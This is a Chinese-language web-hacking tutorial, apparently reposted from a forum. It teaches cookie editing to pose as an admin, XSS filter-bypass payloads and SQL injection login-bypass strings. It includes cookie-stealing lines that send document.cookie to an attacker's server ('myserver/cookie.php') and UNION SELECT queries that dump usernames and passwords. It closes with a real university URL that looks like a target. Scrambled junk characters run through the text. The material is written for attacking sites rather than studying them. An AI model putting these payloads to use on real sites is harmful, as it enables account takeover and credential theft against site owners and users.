XSS & SQL注入

admin

XSS & SQL注入
文章作者：CyberPhreak
4 {& j; M& M( K4 `, ]译文作者：黯魂 [S.S.T]

. \( o1 |2 O2 ]1 f+ w) p  Z
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
4 x7 }0 d8 o& h. j! k) wX Web Security - XSS & more X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

: k! \0 l* R! O/ F- U' ?* z
5 r3 ?2 m) U% x~介绍
3 g5 z+ A8 k) x4 I
在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.

XXXXXXXXXXXXXXXXXXXXX
% ], f: P4 C/ H9 X$ h& E8 |" vX Table OF Contents X
XXXXXXXXXXXXXXXXXXXXX

( ]5 ?2 o, b! L2 YXXXXXXXXXXXXXXXXXXXX
6 B6 Q. _2 W) J" n8 RX Cookie Editing X
2 B5 z% J! n9 `X XSS X
X SQL Injection X
5 g! l: \4 O0 `, w) l; `$ PXXXXXXXXXXXXXXXXXXXX

3 l. a' g8 z# J/ M* _~什么是cookie

% K" p7 ~; ~2 S. [1 ~7 s. ~5 Qcookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.

~警告&欺骗
5 x$ q, J! Q' I3 {  m6 N  Z
那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:
1 E8 s" e/ c; V- B0 J! @. T6 Q
strusername=cnsst;strpassword=cnsst

3 X" c% t9 [1 z此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...
  G  w, F- w9 j7 ^
~什么是XSS
1 |* J' L% B5 a5 }! ^
XSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.

~为什么使用XSS

! L! v" x0 {  P1 H很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.
: v. B, r2 v$ K! }- m" l
~让我们开始吧…

我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.

XSS--跨站脚本&lt;html&gt;

&lt;body&gt;

&lt;form action="" method="GET"&gt;

) x% W+ Q" Q8 C; q7 Y. e&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;

+ b  |$ N' _2 H! N% K( tScript: &lt;input name="name" type="name"&gt;

% s5 {/ T+ G9 j4 x( U# w&lt;input type="submit" value="submit"&gt;

  D, m/ l5 W" L/ ~; C- r&lt;/form&gt;

&lt;/body&gt;

8 B( y0 I( |+ Q5 W4 U&lt;/html&gt;
7 @& u0 R+ r* q4 M1 `% {
# I, R5 p1 J% s

# [$ e4 ~7 n: r) H$ b&lt;?php
& s3 i; @3 {0 u( c# W
3 ]" M% a+ D& R# A1 V; T: k$name = $_GET['name'];
  W* U5 J$ ]$ \$ l8 L" O
- k5 y/ g- u2 w# A0 oecho("Hello $name");

& a: ?  ]) C5 \?&gt;
复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:

cnsst
"Hello cnsst!"
' ^: J5 L  X$ K. J
引号内的信息就是输出信息..注意看,现在我输入:
. ^2 P: L7 Z0 I<script>alert(document.cookie)</script>

7 p2 ]& @, u/ o/ D那么它将会弹出document.cookie!所以它是易受XSS攻击的!
* b' r* {3 ]$ p2 J4 Q
现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...

服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...

4 K* _* V5 K" Y+ E1 z已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.

$ n8 Y- b( @5 f* d$ H1 {% _让我们看一个稍微复杂点的例子!

, d5 J8 ^2 ~  G- Q5 i# |5 M假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
5 Z5 a7 h4 K: Iscriptalert(document.cookie)/script
或者可能是这样的:
# H7 R7 L" t7 Yscriptalertdocument.cookie/script
1 Z! S; b( k, H$ u
! \5 V/ U( r5 m/ K可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.

让我们继续利用:
4 R3 n5 D8 x( V2 D: D1 Q4 v$ }<<script>>alert(document.cookie)<</script>>

* h7 I' A2 ?" i. k0 i你的输出将弹出document.cookie.
  C- w) W4 y- |6 `
现在来看看更狠的:
<<script>>alert((document.cookie))<<//script>>

3 k, z) q) W8 T7 a; f. a# d5 B# Z
+ w% h# z4 f* f! K* w6 A9 W他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
! M  J1 l+ C5 X& fscriptalertdocument.cookie/script
) |8 u- E9 D5 l- U或者 <<<script>>>alert(document.cookie)<<</script>>>  

他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
<script>alert(document.cookie)</script>
8 G5 \) b" i  U/ I
. ~3 c# I: p+ D  D+ T0 c2 Z输出像这样:srplert(document.cookie)srp

8 P2 z, j4 j# F% s仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
# p- l- h) q2 |  I0 o  L2 d3 _0 r<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>
9 J9 Y, L  t& z
( @1 o6 o& }1 E; `# r所有重复多余的部分刚好被替换!现在让我们来点更高级的!

这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
  w) ?8 b8 b, A* c6 ~& ]<script>alert(document.cookie)</script>
5 `$ A% Q3 D8 j1 {8 i' w- V! {4 e
输出将是:
: u1 `1 k3 q) b% oscriptalert(document.cookie)script

. s8 `  Q; t3 _( T看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
0 `% ]) L) ]( C1 z! U<<script>>alert(document.cookie)<</script>>

$ E* F0 u. C2 G# r0 f3 W输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:

+ m, o' m3 }/ Z: {" o7 D2 g( {3 ?1 U<
5 ^( n, o5 J9 p/ a; T7 J1 Q' s' X* yscript
>
alert
(
* t8 s" Y9 |+ w7 i; w6 Ydocument
.
cookie
. {* x1 U& S& k, V! Q)
, x& y  o& d$ }: ^<
3 w* |  S4 p$ s+ H8 o/
3 Q, E5 w# R8 Zscript
>
8 y* |) h9 z) k0 ?) h
' `$ R+ R' X  t" H9 f6 v4 h
' y: [. G: [  ^2 y) y看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
<
- |& s- c% p. ]& O" qs
c
r
i
p
t
+ T3 _- z2 n/ l: _>
a
4 x5 m4 V* O6 \  L- M, }9 E2 Il
4 c6 v- o( u+ A) v6 S4 B' P3 e0 ge
r
# A. m$ K4 G: P: Ft
(
* n4 l$ v9 a+ F* I; C  o, V4 [d
o
c
u
m
e
n
t
* R0 E/ [% F0 S  A2 E8 L1 {.
c
o
7 T+ h3 ^8 J9 |9 u2 F/ R- Ko
& {) q- {5 ~: g/ a( q0 xk
" j7 Q5 _3 q2 Ti
' m5 `4 P1 L6 P3 p- r' W( qe
, g( |6 q# K2 P)
/ y, l5 h8 Q  V( q4 g<
% F, H! V, Q1 T2 n0 x/
s
c
r
i
p
/ t+ G' n0 `4 m  r" T" {# \) lt
7 Z; p$ E6 R- g2 q' n/
4 X1 {( S; J8 e3 Z, C1 M>
. E6 Y5 }" s& h* D
; W& d* t+ m# S6 u这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)

, c& s8 C. h: t/ P还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.

现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.

首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.
+ p$ p# V) J4 _. @% `$ Q4 I
我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
9 Z, ]5 @$ ]- udocument.forms(0).action ="http://myserver/myscript.php
这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.
# W, Z. P' ?+ V6 C7 F5 [
7 ~/ \8 `! j: b9 w$ m再次假设你在网站上注册了一个帐号,并且可以自定义资料...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
; }6 N6 m# v+ v: n3 h+ Bjavascript:location.href="http://myserver/cookie.php"+document.cookie
这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.

有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
telnet example.com
! `  L& o+ C0 J) }# [/ H0 SGET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
( m' ]9 u6 i7 X6 I+ oUser-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
: }4 E+ {& g$ \# k! P; `* PReferer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
$ f8 i4 T3 q7 b. ^/ ^3 _~什么是SQL注入
4 M+ [8 Y1 C- o- P, c  J3 ?8 Q
) @6 F7 n& A. M9 s6 z& H3 r3 k" TSQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;

1 }  o# f8 V$ C: X9 g% Z( x&lt;body&gt;
7 W- r2 \" \5 L1 E9 P) f
&lt;form action="" method="POST"&gt;

& M* \$ |; e9 @0 @7 g/ |( AUsername: &lt;input name="name" type="name"&gt;

Password: &lt;input name="password" type="password"&gt;
3 @/ M: U8 \+ p6 V; C% \) {2 W0 ]
&lt;input type="submit" type="submit" value="Submit"&gt;
. R. Z( o) B% P2 S! z- Z. l% Y9 f6 c
! v0 y6 r( [2 Z&lt;/form&gt;

3 g$ N; X5 `( P' @&lt;/body&gt;

/ a& ~! l5 w# x- Z" o* a&lt;/html&gt;
复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!
4 ~/ l0 L* E' S! S3 ~7 [$ M4 L
! d7 x& ~4 H& Q$ _" F$ o+ @最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.

'='
'OR 1=1--
'OR a=a--
# z7 j2 ~8 [8 c2 w- A'OR'

自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:
% o! _/ A+ R# N0 e
'OR''='
2 R" S9 F7 s! _- U: G1 J7 E'OR"="
  o3 E% f+ H  d$ I$ K'OR'="
0 S$ M7 p6 t3 Q# \* t) ^6 `+ u'OR '="
# n. I7 W. l# h7 N# ~'OR "='
& r2 y8 u9 X, e* S$ T'OR ''='
'OR '=''
'OR "=''
'OR ''="


~
0 Q- P8 x$ z  A4 _( s+ z; _- f现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
UNION ALL SELECT username,password FROM users
4 A! ^2 P* P2 g9 ^' q
% G# ]( R- n8 f4 o$ i这个查询语句将执行,但是….如果毫无作用呢?
& h3 J) p" I6 e; C# b' XUNION ALL SELECT username,password FROM users WHERE username='OR "='
! ]8 d: C, f  W$ JAND password='OR "='
" L- R) E9 w# M7 a' S
6 t- b. R+ |% x6 `, |你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.

# V5 I- n- y* N* V% g一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
UNION ALL SELECT
% m; a/ k% c/ e0 Q3 m- fip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
WHERE ip='OR''="

% @  k; W+ H) a5 a- `7 s现在你看到这个了吗?(我确信你已经看到了)
http://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
% X' \) n1 D3 x) e$ k" m) _http://example.com/index.php?article='
5 p7 K; y% {) c) Q+ t
% N9 v6 t  |% N0 F
- S# a4 N8 ~# Y, v  t现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
http://example.com/index.php?article='
* N. Y  q4 d% v0 lhttp://example.com/index.php?article='='
http://example.com/index.php?article='OR 1=1--
http://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
% C$ y( k9 _2 z# Y" |http://example.com/index.php?article='OR "='
9 W$ a: ]2 P; o& I# @( X. ghttp://example.com/index.php?article='OR ''='
http://example.com/index.php?article='OR '=''
5 d, J2 r; F. ~: @! }" khttp://example.com/index.php?article='OR''='
http://example.com/index.php?article='OR"'='
http://example.com/index.php?article='OR"''='

尽情发挥自己的创造力!
; e1 U% A" k% F7 }; j5 c; @http://www.ie.tsinghua.edu.cn/notice/show.php?id=704